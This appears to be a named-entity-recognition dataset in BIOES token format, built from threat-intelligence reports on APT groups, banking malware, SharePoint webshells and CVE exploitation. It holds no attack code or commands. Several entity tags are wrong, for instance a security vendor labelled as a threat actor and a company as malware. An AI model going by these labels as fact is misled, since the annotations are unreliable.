O +According O +to O +local O +media O +reports O +, O +in B-TIME +2019 E-TIME +Silence S-APT +successfully O +withdrew O +money O +from O +the O +Bangladeshi S-LOC +bank S-IDTY +twice O +within O +2 O +months O +. O +To O +do O +this O +, O +the O +actor O +may O +have O +used O +a O +unique O +tool O +called O +Atmosphere S-MAL +, O +a O +Trojan S-MAL +developed O +by O +Silence S-APT +to O +remotely O +control O +ATM O +dispensers O +, O +or O +a O +similar O +program O +called O +xfs-disp.exe S-FILE +, O +which O +the O +actor O +may O +have O +used O +in O +their O +attack O +on O +IT O +Bank S-IDTY +. O +As O +we O +described O +in O +Silence: S-APT +Moving O +into O +the O +darkside O +report O +, O +Silence S-APT +has O +experience O +with O +theft O +using O +compromised O +card O +processing O +systems O +. O +In O +February B-TIME +2019 E-TIME +, O +Russian S-LOC +media7 O +reported O +a O +Silence B-ACT +attack E-ACT +on O +IT O +Bank O +in O +the O +city O +of O +Omsk O +. O +On O +16 B-TIME +January I-TIME +2019 E-TIME +, O +Silence S-APT +sent O +out O +phishing B-ACT +emails S-TOOL +with O +malicious O +attachments O +disguised O +as O +invitations O +to O +the O +International O +Financial S-IDTY +Forum O +iFin-2019 O +. O + +Group-IB S-SECTEAM +specialists O +determined O +that O +the O +email S-TOOL +addresses O +of O +IT O +bank S-IDTY +employees S-IDTY +were O +among O +the O +recipients O +of O +these O +emails S-TOOL +. O +The O +main O +goal O +of O +Silence.Downloader S-FILE +is O +to O +receive O +an O +executable O +file O +and O +run O +it O +on O +an O +infected O +machine O +. O +Silence.MainModule S-FILE +is O +a O +typical O +remote O +control O +Trojan S-MAL +that O +provides O +access O +to O +the O +command O +shell O +CMD.exe S-FILE +with O +the O +possibility O +of O +downloading O +files O +from O +remote O +nodes O +to O +a O +computer O +and O +uploading O +files O +from O +a O +computer O +to O +a O +remote O +server O +. 
O +Since O +at O +least O +2011 S-TIME +, O +these O +hackers O +have O +been O +using O +malware S-MAL +to O +spy O +on O +corporate O +networks O +. O +Hackers S-APT +are O +targeting O +high-tech B-IDTY +companies E-IDTY +as O +well O +as O +chemical S-IDTY +and O +pharmaceutical S-IDTY +companies O +. O +The O +hackers O +will O +map O +a O +company’s O +network O +and O +look O +for O +strategically O +favorable O +locations O +for O +placing O +their O +malware O +. O +The O +corporation O +conrms O +the O +Winnti S-APT +incident O +and O +issues O +the O +following O +statement: O +The O +cyberattack O +was O +discovered O +in O +the O +summer O +of O +2014 S-TIME +and O +Henkel O +promptly O +took O +all O +necessary O +precautions.” O +Henkel O +claims O +that O +a O +very O +small O +portion” O +of O +its O +worldwide O +IT O +systems O +had O +been O +aected O +— O +the O +systems O +in O +Germany S-LOC +. O +A O +BASF O +spokeswoman O +tells O +us O +in O +an O +email S-TOOL +that O +in O +July B-TIME +2015 E-TIME +, O +hackers O +had O +successfully O +overcome O +the O +rst O +levels” O +of O +defense O +. O +The O +tool O +was O +written O +by O +sta O +of O +Thyssenkrupp S-MAL +, O +because O +the O +industrial O +giant—company O +number O +eleven—had O +been O +spied O +on O +by O +Winnti S-APT +. O +Hackers S-APT +are O +charged O +with O +spying O +on O +a O +manufacturer S-IDTY +of O +gas O +turbines O +. O +The O +Hong B-LOC +Kong E-LOC +government O +was O +spied O +on O +by O +the O +Winnti S-APT +hackers O +. O +Komplex S-MAL +is O +a O +backdoor O +that O +has O +been O +used O +by O +APT28 S-APT +on O +OS O +X O +and O +appears O +to O +be O +developed O +in O +a O +similar O +manner O +to O +XAgentOSX O +. 
O +While O +OceanLotus’ S-APT +targets O +are O +global O +, O +their O +operations O +are O +mostly O +active O +within O +the O +APAC S-LOC +region O +which O +encompasses O +targeting O +private O +sectors O +across O +multiple O +industries O +, O +foreign B-IDTY +governments E-IDTY +, O +activists S-IDTY +, O +and O +dissidents S-IDTY +connected O +to O +Vietnam S-LOC +. O +NewsBeef S-APT +attacks O +against O +Saudi B-LOC +Arabian E-LOC +organizations O +and O +individuals O +are O +likely O +to O +continue O +. O +Rapid7 S-SECTEAM +discovered O +that O +additional O +data O +was O +placed O +into O +the O +Dropbox S-TOOL +accounts O +under O +control O +of O +the O +APT10 S-APT +during O +the O +compromise O +and O +was O +able O +to O +attribute O +data O +that O +was O +placed S-ACT +into O +it O +as O +being O +owned O +by O +Visma O +. O +Rapid7 S-SECTEAM +again O +observed O +APT10 S-APT +dropping O +payloads O +named O +ccSEUPDT.exe S-FILE +. O +These O +RAT O +families O +are O +discussed O +in O +Novetta’s S-SECTEAM +other O +report O +on O +the O +Lazarus S-APT +Group’s O +RAT O +and O +Staging O +capabilities O +. O +Magic B-APT +Hound E-APT +has O +primarily O +targeted O +organizations O +in O +the O +energy S-IDTY +, O +government S-IDTY +, O +and O +technology S-IDTY +sectors O +that O +are O +either O +based O +or O +have O +business O +interests O +in O +Saudi B-LOC +Arabia E-LOC +. O +Since O +at O +least O +2013 S-TIME +, O +the O +Iranian S-LOC +threat O +group O +that O +FireEye S-SECTEAM +tracks O +as O +APT33 S-APT +has O +carried O +out O +a O +Cyber B-ACT +Espionage E-ACT +operation O +to O +collect O +information O +from O +defense S-IDTY +, O +aerospace S-IDTY +and O +petrochemical S-IDTY +organizations O +. 
O +CTU S-SECTEAM +researchers O +observed O +likely O +unsuccessful O +phishing B-ACT +campaigns E-ACT +being O +followed O +by O +highly O +targeted O +spearphishing S-ACT +and O +social B-ACT +engineering I-ACT +attacks E-ACT +from O +a O +threat O +actor O +using O +the O +name O +Mia B-APT +Ash E-APT +. O +CTU S-SECTEAM +researchers O +conclude O +that O +COBALT B-APT +GYPSY E-APT +created O +the O +persona O +to O +gain O +unauthorized O +access O +to O +targeted O +computer O +networks O +via O +social B-ACT +engineering E-ACT +. O +Characterized O +by O +relatively O +unsophisticated O +technical O +merit O +and O +extensive O +use O +of O +spear B-ACT +phishing E-ACT +, O +the O +Magic B-APT +Hound E-APT +targeted O +individuals O +and O +organizations O +in O +the O +Middle B-LOC +East E-LOC +, O +as O +well O +as O +across O +Europe S-LOC +and O +in O +the O +United B-LOC +States E-LOC +. O +These O +malware S-FILE +families O +have O +a O +rich O +history O +of O +being O +used O +in O +many O +targeted O +attacks O +against O +government S-IDTY +and O +private S-IDTY +organizations S-IDTY +. O +The O +activity O +surfaced O +in O +Southeast B-LOC +Asia E-LOC +, O +a O +region O +where O +APT10 S-APT +frequently O +operates O +. O +The O +samples S-FILE +we O +analyzed O +originated O +from O +the O +Philippines S-LOC +. O +APT10 S-APT +frequently O +targets O +the O +Southeast B-LOC +Asia E-LOC +region O +. O +Both O +of O +the O +loader’s O +variants O +and O +their O +various O +payloads O +that O +enSilo S-SECTEAM +analyzed O +share O +similar O +Tactics O +, O +Techniques O +, O +and O +Procedures O +and O +code O +associated O +with O +APT10 S-APT +. O +Typically O +, O +APT10 S-APT +tends O +to O +employ S-ACT +a O +namesquatting O +scheme O +in O +their O +domains O +that O +aims O +to O +confuse O +the O +observer O +by O +posing O +as O +a O +legitimate O +domain O +. 
O +Also O +, O +the O +certificate O +embedded O +in O +the O +Quasar O +sample S-FILE +was O +issued O +at O +22.12.2018 S-TIME +, O +which O +correlates O +with O +the O +file’s O +compilation O +date O +. O +Over O +the O +past O +three O +months O +, O +Recorded B-SECTEAM +Future’s E-SECTEAM +Insikt O +Group O +has O +observed O +an O +increase O +in O +APT33’s S-APT +also O +known O +as O +Elfin S-APT +infrastructure O +building O +and O +targeting O +activity O +, O +and O +on O +June B-TIME +21 E-TIME +, O +2019 S-TIME +, O +Yahoo O +. O +News O +reported O +that O +the O +U.S. B-SECTEAM +Cyber E-SECTEAM +Command O +launched O +cyberattacks O +on O +an O +Iranian O +spy O +group O +. O +Iranian S-LOC +state-sponsored O +threat O +actor O +APT33 S-APT +has O +been O +conducting O +cyberespionage O +activity O +since O +at O +least O +2013 S-TIME +, O +predominantly O +targeting O +nations O +in O +the O +Middle B-LOC +East E-LOC +, O +but O +also O +notably O +targeting O +U.S. S-LOC +, O +South B-LOC +Korean E-LOC +, O +and O +European S-LOC +commercial O +entities O +across O +a O +wide O +variety O +of O +sectors O +. O +Our O +research O +found O +that O +APT33 S-APT +, O +or O +a O +closely O +aligned O +threat O +actor O +, O +continues O +to O +conduct O +and O +prepare O +for O +widespread O +cyberespionage O +activity O +, O +with O +over O +1 O +, O +200 O +domains O +used O +since O +March B-TIME +28 E-TIME +, O +2019 S-TIME +and O +with O +a O +strong O +emphasis O +on O +using O +commodity O +malware O +. O +The O +targeting O +of O +mainly O +Saudi B-LOC +Arabian E-LOC +organizations O +across O +a O +wide O +variety O +of O +industries O +aligns O +with O +historical O +targeting O +patterns O +for O +the O +group O +, O +which O +appear O +undeterred O +following O +previous O +exposés O +of O +their O +activity O +. 
O +Towards O +the O +end O +of O +April B-TIME +2019 E-TIME +, O +we O +tracked O +down O +what O +we O +believe O +to O +be O +new O +activity O +by O +APT10 S-APT +, O +a O +Chinese S-LOC +Cyber B-ACT +Espionage E-ACT +group O +. O +Almost O +60% O +of O +the O +suspected O +APT33 S-APT +domains O +that O +were O +classified O +to O +malware O +families O +related O +to O +njRAT S-MAL +infections O +, O +a O +RAT O +not O +previously O +associated O +with O +APT33 S-APT +activity O +. O +Other O +commodity O +RAT O +malware O +families O +, O +such O +as O +AdwindRAT S-MAL +and O +RevengeRAT S-MAL +, O +were O +also O +linked O +to O +suspected O +APT33 S-APT +domain O +activity O +. O +APT33 S-APT +is O +an O +Iranian S-LOC +state-sponsored O +threat O +actor O +that O +has O +engaged O +in O +cyberespionage O +activities O +since O +at O +least O +2013 S-TIME +. O +Western S-LOC +and O +Saudi S-LOC +organizations O +in O +industries O +that O +have O +been O +historically O +targeted O +by O +APT33 S-APT +should O +be O +monitoring O +geopolitical O +developments O +and O +increasing O +the O +scrutiny O +of O +operational O +security O +controls O +focusing O +on O +detection O +and O +remediation O +of O +initial O +unauthorized O +access O +, O +specifically O +from O +phishing B-ACT +campaigns E-ACT +, O +webshells S-TOOL +. O +Symantec’s S-SECTEAM +Elfin S-APT +report O +denoted O +additional O +targeting O +of O +the O +engineering S-IDTY +, O +chemical S-IDTY +, O +research E-IDTY +, O +finance E-IDTY +, O +IT O +, O +and O +healthcare S-IDTY +sectors O +. 
O +We O +assess O +that O +the O +recent O +reporting O +on O +links O +between O +the O +Nasr B-IDTY +Institute E-IDTY +and O +Kavosh O +Security O +Group S-APT +, O +as O +well O +as O +technical O +and O +persona O +analysis O +, O +overlaps O +among O +APT33 S-APT +, O +APT35 S-APT +, O +and O +MUDDYWATER S-APT +, O +and O +is O +probably O +a O +result O +of O +the O +tiered O +structure O +that O +Iran S-LOC +utilizes O +to O +manage O +cyber O +operations O +. O +Recorded B-SECTEAM +Future E-SECTEAM +has O +been O +monitoring O +APT33 S-APT +activity O +, O +beginning O +with O +research O +published O +in O +October B-TIME +2017 E-TIME +, O +which O +revealed O +new O +infrastructure O +, O +malware O +hashes O +, O +and O +TTPs O +relating O +to O +the O +threat O +actor(s) O +. O +FireEye S-SECTEAM +also O +noted O +in O +their O +2017 S-TIME +report O +that O +the O +online O +handle O +xman_1365_x O +, O +” O +found O +within O +the O +PDB O +path O +in O +an O +APT33 S-APT +TURNEDUP O +backdoor O +sample O +, O +belonged O +to O +an O +individual O +at O +the O +Nasr O +Institute O +. O +Recorded B-SECTEAM +Future’s E-SECTEAM +Insikt S-APT +Group S-APT +has O +been O +monitoring O +APT33 S-APT +activity O +, O +beginning O +with O +research O +published O +in O +October B-TIME +2017 E-TIME +, O +which O +revealed O +new O +infrastructure O +, O +malware O +hashes O +, O +and O +TTPs O +relating O +to O +the O +threat O +actor(s) O +. O +Based O +on O +this O +information O +, O +it O +is O +possible O +that O +upon O +the O +exposure O +of O +the O +Nasr S-APT +Institute O +as O +a O +front O +for O +Iranian S-LOC +state-sponsored O +offensive O +cyber O +activity O +, O +employees O +transitioned O +over O +to O +other O +entities O +, O +such O +as O +Kavosh O +, O +to O +protect O +their O +identities O +and O +minimize O +further O +exposure O +. 
O +Insikt S-SECTEAM +Group O +researchers O +used O +proprietary O +methods O +, O +including O +Recorded O +Future O +Domain O +Analysis O +and O +Recorded B-SECTEAM +Future E-SECTEAM +Network O +Traffic O +Analysis O +, O +along O +with O +other O +common O +analytical O +approaches O +, O +to O +profile O +recently O +reported O +Iranian O +threat O +actor O +APT33’s S-APT +domain O +and O +hosting O +infrastructure O +in O +an O +effort O +to O +identify O +recent O +activity O +. O +Insikt S-SECTEAM +Group O +enumerated O +all O +domains O +reported O +as O +being O +used O +by O +APT33 S-APT +since O +January B-TIME +2019 E-TIME +. O +PlugX S-FILE +is O +a O +modular O +structured O +malware O +that O +has O +many O +different O +operational O +plugins O +such O +as O +communication O +compression O +and O +encryption O +, O +network O +enumeration O +, O +files O +interaction O +, O +remote O +shell O +operations O +and O +more O +. O +Using O +data O +from O +Recorded B-SECTEAM +Future E-SECTEAM +Domain O +Analysis O +and O +combining O +it O +with O +data O +derived O +from O +Recorded O +Future O +Network O +Traffic O +Analysis O +, O +Insikt B-SECTEAM +Group E-SECTEAM +researchers O +were O +able O +to O +identify O +a O +small O +selection O +of O +likely O +targeted O +organizations O +impacted O +by O +suspected O +APT33 S-APT +activity O +. O +Following O +the O +exposure O +of O +a O +wide O +range O +of O +their O +infrastructure O +and O +operations O +by O +Symantec S-SECTEAM +earlier O +this O +year O +, O +we O +discovered O +that O +APT33 S-APT +, O +or O +closely O +aligned O +actors O +, O +reacted O +by O +either O +parking O +or O +reassigning O +some O +of O +their O +domain O +infrastructure O +. 
O +Since O +late B-TIME +March E-TIME +, O +suspected O +APT33 S-APT +threat O +actors O +have O +continued O +to O +use O +a O +large O +swath O +of O +operational O +infrastructure O +, O +well O +in O +excess O +of O +1 O +, O +200 O +domains O +, O +with O +many O +observed O +communicating O +with O +19 O +different O +commodity O +RAT S-MAL +implants O +. O +While O +we O +haven’t O +observed O +a O +widespread O +targeting O +of O +commercial O +entities O +or O +regional O +adversaries O +like O +in O +previously O +documented O +APT33 S-APT +operations O +, O +the O +handful O +of O +targeted O +organizations O +that O +we O +did O +observe O +were O +mainly O +located O +in O +Saudi B-LOC +Arabia E-LOC +across O +a O +range O +of O +industries O +, O +indicating O +ongoing O +targeting O +aligned O +with O +geopolitical O +aims O +. O +The O +zip O +contained O +a O +sample O +of O +the O +Poison B-MAL +Ivy E-MAL +malware O +which O +is O +also O +known O +to O +be O +used O +by O +APT10 S-APT +. O +The O +new O +malware O +families O +, O +which O +we O +will O +examine O +later O +in O +this O +post O +, O +show O +APT34 S-APT +relying O +on O +their O +PowerShell S-MAL +development O +capabilities O +, O +as O +well O +as O +trying O +their O +hand O +at O +Golang O +. O +Additionally O +, O +with O +the O +assistance O +of O +our O +FireEye S-SECTEAM +Labs O +Advanced O +Reverse O +Engineering O +(FLARE) O +, O +Intelligence O +, O +and O +Advanced B-SECTEAM +Practices E-SECTEAM +teams O +, O +we O +identified O +three O +new O +malware O +families O +and O +a O +reappearance O +of O +PICKPOCKET O +, O +malware O +exclusively O +observed O +in O +use O +by O +APT34 S-MAL +. 
O +This O +threat O +group O +has O +conducted O +broad O +targeting O +across O +a O +variety O +of O +industries O +operating O +in O +the O +Middle S-LOC +East; S-LOC +however O +, O +we O +believe O +APT34's O +strongest O +interest O +is O +gaining O +access O +to O +financial S-IDTY +, O +energy S-IDTY +, O +and O +government S-IDTY +entities O +. O +Additionally O +, O +with O +the O +assistance O +of O +FireEye B-SECTEAM +Labs E-SECTEAM +, O +we O +identified O +three O +new O +malware O +families O +and O +a O +reappearance O +of O +PICKPOCKET S-MAL +, O +malware O +exclusively O +observed O +in O +use O +by O +APT34 S-APT +. O +APT34 S-APT +is O +an O +Iran-nexus O +cluster O +of O +cyber O +espionage B-ACT +activity E-ACT +that O +has O +been O +active O +since O +at O +least O +2014 S-TIME +. O +This O +CPE O +was O +created O +to O +ensure O +our O +customers O +are O +updated O +with O +new O +discoveries O +, O +activity O +and O +detection O +efforts O +related O +to O +this O +campaign O +, O +along O +with O +other O +recent O +activity O +from O +Iranian-nexus S-LOC +threat O +actors O +to O +include O +APT33 S-APT +, O +which O +is O +mentioned O +in O +this O +updated O +FireEye S-SECTEAM +blog O +post O +. O +On O +June B-TIME +19 E-TIME +, O +2019 S-TIME +, O +FireEye’s S-SECTEAM +Managed O +Defense O +Security O +Operations O +Center O +received O +an O +exploit S-VULNAME +detection O +alert O +on O +one O +of O +our O +FireEye S-SECTEAM +Endpoint O +Security O +appliances O +. O +A O +backdoor O +that O +communicates O +with O +a O +single O +command O +and O +control O +server O +using O +HTTP S-PROT +GET O +and O +POST O +requests O +, O +TONEDEAF S-FILE +supports O +collecting O +system O +information O +, O +uploading O +and O +downloading O +of O +files O +, O +and O +arbitrary O +shell O +command O +execution O +. 
O +FireEye’s S-SECTEAM +Advanced O +Practices O +and O +Intelligence O +teams O +were O +able O +to O +identify O +additional O +artifacts O +and O +activity O +from O +the O +APT34 S-APT +actors O +at O +other O +victim B-IDTY +organizations E-IDTY +. O +Of O +note O +, O +FireEye S-SECTEAM +discovered O +two O +additional O +new O +malware O +families O +hosted O +at O +this O +domain O +, O +VALUEVAULT S-FILE +and O +LONGWATCH S-FILE +. O +This O +tool S-MAL +was O +previously O +observed O +during O +a O +Mandiant S-ACT +incident O +response O +in O +2018 S-TIME +and O +, O +to O +date O +, O +solely O +utilized O +by O +APT34 S-APT +. O +PICKPOCKET S-FILE +is O +a O +credential O +theft O +tool O +that O +dumps O +the O +user's O +website O +login O +credentials O +from O +Chrome O +, O +Firefox O +, O +and O +Internet O +Explorer O +to O +a O +file O +. O +FireEye S-SECTEAM +detects O +this O +activity O +across O +our O +platforms O +, O +including O +named O +detection O +for O +TONEDEAF S-FILE +, O +VALUEVAULT S-FILE +, O +and O +LONGWATCH S-FILE +. O +Several O +spear-phishing S-ACT +campaigns O +attributed O +to O +Carbanak S-APT +, O +all O +occurring O +between O +March S-TIME +and O +May B-TIME +2018 E-TIME +, O +were O +analyzed O +by O +security O +researchers O +in O +2018 S-TIME +. O +One O +of O +the O +most O +prolific O +APT-style O +cyberattacks O +, O +specifically O +targeting O +the O +financial S-IDTY +sector O +, O +is O +known O +as O +Carbanak S-APT +. O +Discovered O +in O +2014 S-TIME +, O +the O +campaign O +quickly O +gained O +notoriety O +after O +compromising O +the O +security O +systems O +of O +100 O +banks S-IDTY +in O +40 O +countries O +and O +stealing O +up O +to O +$1 O +billion O +in O +the O +process O +. 
O +The O +same O +group O +is O +believed O +to O +have O +also O +been O +using O +the O +Cobalt O +Strike O +framework S-MAL +to O +run O +sophisticated B-ACT +campaigns E-ACT +, O +plotting O +and O +performing O +financial S-IDTY +heists O +of O +financial O +institutions O +. O +Banks S-IDTY +in O +countries O +such O +as O +Russia S-LOC +, O +the O +United B-LOC +Kingdom E-LOC +, O +the O +Netherlands S-LOC +, O +Spain S-LOC +, O +Romania S-LOC +, O +Belarus S-LOC +, O +Poland S-LOC +, O +Estonia S-LOC +, O +Bulgaria S-LOC +, O +Georgia S-LOC +, O +Moldova S-LOC +, O +Kyrgyzstan S-LOC +, O +Armenia S-LOC +, O +Taiwan S-LOC +and O +Malaysia S-LOC +have O +allegedly O +been O +targeted O +with O +spearphishing B-FILE +emails E-FILE +, O +luring O +victims O +into O +clicking O +malicious O +URLs O +and O +executing O +booby-trapped O +documents O +. O +A O +Carbanak S-APT +trademark O +in O +cyberattacks O +remains O +the O +use O +of O +Cobalt B-MAL +Strike E-MAL +– O +a O +powerful O +pentesting O +tool O +designed O +for O +exploiting O +and O +executing O +malicious O +code O +, O +simulating O +post-exploitation O +actions O +of O +advanced O +threat O +actors O +– O +which O +allows O +them O +to O +infiltrate O +the O +organization O +, O +move O +laterally O +, O +exfiltrate B-ACT +data E-ACT +, O +and O +deploy S-ACT +anti-forensic O +and O +evasion O +tools O +. O +However O +, O +this O +action O +doesn’t O +appear O +to O +have O +made O +a O +dent O +in O +the O +cybercriminal O +organization O +, O +as O +subsequent O +spear-phishing S-ACT +campaigns O +seem O +to O +have O +been O +reported O +from O +March S-TIME +until O +May B-TIME +2018 E-TIME +. O +Bitdefender’s S-APT +forensics O +and O +investigation O +team O +was O +contacted O +to O +look O +into O +a O +security O +incident O +that O +started O +in O +May B-TIME +2018 E-TIME +with O +an O +email S-TOOL +received O +by O +two O +of O +the O +bank’s S-IDTY +employees O +. 
O +The O +Carbanak S-APT +group O +, O +which O +has O +a O +long O +track O +record O +of O +compromising O +infrastructure O +belonging O +to O +financial S-IDTY +institutions O +, O +is O +still O +active O +. O +Its S-APT +purpose O +remains O +to O +manipulate O +financial S-ACT +assets O +, O +such O +as O +transferring O +funds O +from O +bank S-IDTY +accounts O +or O +taking O +over O +ATM O +infrastructures O +and O +instructing O +them O +to O +dispense O +cash O +at O +predetermined O +time O +intervals O +. O +If O +the O +attack O +had O +succeeded O +, O +it O +would O +have O +given O +hackers O +control O +over O +the O +ATM O +network O +, O +while O +money O +mules O +would O +have O +been O +standing O +by O +the O +ATM O +machines O +at O +pre-set O +time O +intervals O +to O +cash O +them O +out O +. O +The O +actors S-APT +uploaded O +a O +variety O +of O +tools O +that O +they O +used O +to O +perform O +additional O +activities O +on O +the O +compromised O +network O +, O +such O +as O +dumping B-MAL +credentials E-MAL +, O +as O +well O +as O +locating S-ACT +and O +pivoting S-ACT +to O +additional O +systems O +on O +the O +network O +. O +We O +believe O +Emissary B-APT +Panda E-APT +exploited O +a O +recently O +patched O +vulnerability S-VULNAME +in O +Microsoft S-IDTY +SharePoint O +tracked O +by O +CVE-2019-0604 S-VULID +, O +which O +is O +a O +remote O +code O +execution O +vulnerability O +used O +to O +compromise O +the O +server O +and O +eventually O +install O +a O +webshell O +. 
O +Bitdefender’s S-APT +investigation O +shows O +the O +attackers’ O +main O +methods O +remain O +to O +quietly O +infiltrate O +the O +infrastructure O +by O +establishing S-ACT +a O +foothold O +on O +an O +employee’s O +system O +, O +then O +move O +laterally O +across O +the O +infrastructure O +or O +elevate O +privileges O +to O +find O +critical O +systems O +that O +manage O +financial B-IDTY +transactions E-IDTY +or O +ATM B-IDTY +networks E-IDTY +. O +We O +also O +found O +the O +China B-MAL +Chopper I-MAL +webshell E-MAL +on O +the O +SharePoint O +servers O +, O +which O +has O +also O +been O +used O +by O +the O +Emissary B-APT +Panda E-APT +threat O +group O +. O +Of O +particular O +note O +is O +their O +use O +of O +tools O +to O +identify O +systems O +vulnerable O +to O +CVE-2017-0144 S-VULID +, O +which O +is O +the O +same O +vulnerability O +exploited O +by O +EternalBlue S-ACT +that O +is O +best O +known O +for O +its O +use O +in O +the O +WannaCry B-ACT +attacks E-ACT +of O +2017 S-TIME +. O +In O +addition O +to O +the O +aforementioned O +post-exploitation O +tools O +, O +the O +actors O +used O +these O +webshells S-TOOL +to O +upload O +legitimate O +executables O +that O +they O +would O +use O +DLL S-TOOL +sideloading O +to O +run B-ACT +a I-ACT +malicious I-ACT +DLL E-ACT +that O +has O +code O +overlaps O +with O +known O +Emissary B-APT +Panda E-APT +attacks O +. O +This O +webshell B-ACT +activity E-ACT +took O +place O +across O +three O +SharePoint O +servers O +hosted O +by O +two O +different O +government O +organizations O +between O +April B-TIME +1 E-TIME +, O +2019 S-TIME +and O +April B-TIME +16 E-TIME +, O +2019 S-TIME +, O +where O +actors O +uploaded O +a O +total O +of O +24 O +unique O +executables O +across O +the O +three O +SharePoint O +servers O +. 
O +The O +timeline O +shows O +three O +main O +clusters O +of O +activity O +across O +the O +three O +webshells S-TOOL +, O +with O +activity O +occurring O +on O +two O +separate O +webshells S-TOOL +within O +a O +very O +small O +window O +of O +time O +on O +April B-TIME +2 E-TIME +, O +2019 S-TIME +and O +the O +activity O +involving O +the O +third O +webshell O +two O +weeks O +later O +on O +April B-TIME +16 E-TIME +, O +2019 S-TIME +. O +In O +April B-TIME +2019 E-TIME +, O +several O +national O +security O +organizations O +released O +alerts O +on O +CVE-2019-0604 S-VULID +exploitation O +, O +including O +the O +Saudi B-LOC +Arabian E-LOC +National O +Cyber B-SECTEAM +Security I-SECTEAM +Center E-SECTEAM +and O +the O +Canadian B-SECTEAM +Center E-SECTEAM +for O +Cyber O +Security O +. O +Based O +on O +the O +functionality O +of O +the O +various O +tools O +uploaded O +to O +the O +webshells S-TOOL +, O +we O +believe O +the O +threat O +actors S-APT +breach O +the O +SharePoint O +servers O +to O +use O +as O +a O +beachhead O +, O +then O +attempt O +to O +move O +laterally O +across O +the O +network O +via O +stolen O +credentials O +and O +exploiting O +vulnerabilities O +. O +We O +also O +observed O +the O +actors S-APT +uploading O +custom O +backdoors O +such O +as O +HyperBro S-MAL +which O +is O +commonly O +associated O +with O +Emissary B-APT +Panda E-APT +. O +Both O +of O +these O +alerts O +discussed O +campaigns O +in O +which O +actors S-APT +used O +the O +CVE-2019-0604 S-VULID +to O +exploit S-VULNAME +SharePoint O +servers O +to O +install O +the O +China B-MAL +Chopper I-MAL +webshell E-MAL +. O +During O +our O +research O +into O +this O +attack O +campaign O +, O +Unit B-SECTEAM +42 E-SECTEAM +gathered O +several O +tools O +that O +the O +Emissary B-APT +Panda E-APT +uploaded O +to O +the O +three O +webshells S-TOOL +at O +the O +two O +government B-IDTY +organizations E-IDTY +. 
O +We O +also O +observed O +the O +actors S-APT +uploading O +the O +HyperBro B-MAL +backdoor E-MAL +to O +one O +of O +the O +webshells S-TOOL +, O +as O +well O +as O +legitimate O +executables O +that O +would O +sideload B-ACT +malicious E-ACT +DLLs S-ACT +that O +have O +overlapping O +code O +associated O +with O +known O +Emissary B-APT +Panda E-APT +activity O +. O +Lastly O +, O +we O +saw O +the O +actor S-APT +uploading O +a O +custom O +backdoor O +called O +HyperBro S-MAL +, O +which O +has O +been O +associated O +with O +Emissary B-APT +Panda E-APT +operations O +in O +the O +past O +. O +The O +other O +overlapping O +files O +are O +tools O +used O +by O +the O +adversary O +to O +locate O +other O +systems O +on O +the O +network O +( O +etool.exe S-FILE +) O +, O +check O +to O +see O +if O +they O +are O +vulnerable O +to O +CVE-2017-0144 S-VULID +( O +EternalBlue S-VULNAME +) O +patched O +in O +MS07-010 S-FILE +(checker1.exe) O +and O +pivot O +to O +them O +using O +remote O +execution O +functionality O +offered O +by O +a O +tool O +similar O +to O +PsExec S-TOOL +offered O +by O +Impacket S-TOOL +( O +psexec.exe S-FILE +) O +. O +Also O +, O +the O +NCSC O +advisory O +mentioned O +that O +the O +actors O +used O +a O +file O +name O +stylecss.aspx S-FILE +for O +their O +webshell O +, O +which O +is O +the O +same O +filename O +we O +saw O +associated O +with O +China B-FILE +Chopper E-FILE +. O +we O +will O +provide O +an O +analysis O +of O +the O +HyperBro S-FILE +tool O +in O +an O +upcoming O +section O +. O +However O +, O +using O +NCC S-SECTEAM +Group’s O +research O +published O +in O +May O +2018 S-TIME +, O +we O +were O +able O +to O +discover O +code O +overlaps O +between O +these O +DLLs O +and O +a O +sideloaded O +DLL S-TOOL +that O +ran O +the O +SysUpdate O +tool O +that O +the O +NCC S-SECTEAM +group O +has O +associated O +with O +an O +Emissary B-APT +Panda E-APT +campaign O +. 
O +The O +list O +also O +includes O +several O +hack B-MAL +tools E-MAL +, O +such O +as O +Mimikatz S-MAL +for O +credential O +dumping O +and O +several O +compiled O +python B-MAL +scripts E-MAL +used O +to O +locate O +and O +compromise O +other O +systems O +on O +the O +local O +network O +. O +Unfortunately O +, O +we O +do O +not O +have O +access O +to O +the O +PYTHON33.hlp O +or O +CreateTsMediaAdm.hlp O +files O +, O +so O +we O +do O +not O +know O +the O +final O +payload O +loaded O +by O +either O +of O +these O +DLLs O +. O +Figure O +9 O +shows O +a O +code O +comparison O +between O +the O +PYTHON33.dll S-FILE +(right) O +and O +inicore_v2.3.30.dll S-FILE +(left) O +(SHA256: O +4d65d371a789aabe1beadcc10b38da1f998cd3ec87d4cc1cfbf0af014b783822 S-SHA2 +) O +, O +which O +was O +sideloaded O +to O +run O +the O +SysUpdate S-MAL +tool O +in O +a O +previous O +Emissary B-APT +Panda E-APT +campaign O +. O + +The O +Emissary B-APT +Panda E-APT +threat O +group O +loaded O +the O +China B-MAL +Chopper E-MAL +webshell O +onto O +SharePoint O +servers O +at O +two O +Government O +organizations O +in O +the O +Middle B-LOC +East E-LOC +, O +which O +we O +believe O +with O +high O +confidence O +involved O +exploiting O +a O +remote O +code O +execution O +vulnerability O +in O +SharePoint O +tracked O +in O +CVE-2019-0604 S-VULID +. O +The O +files O +uploaded O +to O +this O +webshell O +included O +the O +same O +compiled O +python B-MAL +script E-MAL +that O +would O +scan O +remote O +systems O +that O +were O +vulnerable O +to O +CVE-2017-0144 S-VULID +( O +EternalBlue S-VULNAME +) O +that O +we O +saw O +uploaded O +to O +the O +other O +errr.aspx S-FILE +webshell O +. O +According O +to O +Microsoft’s S-SECTEAM +advisory O +, O +this O +vulnerability O +was O +patched O +on O +March B-TIME +12 E-TIME +, O +2019 S-TIME +and O +we O +first O +saw O +the O +webshell O +activity O +on O +April B-TIME +1 E-TIME +, O +2019 S-TIME +. 
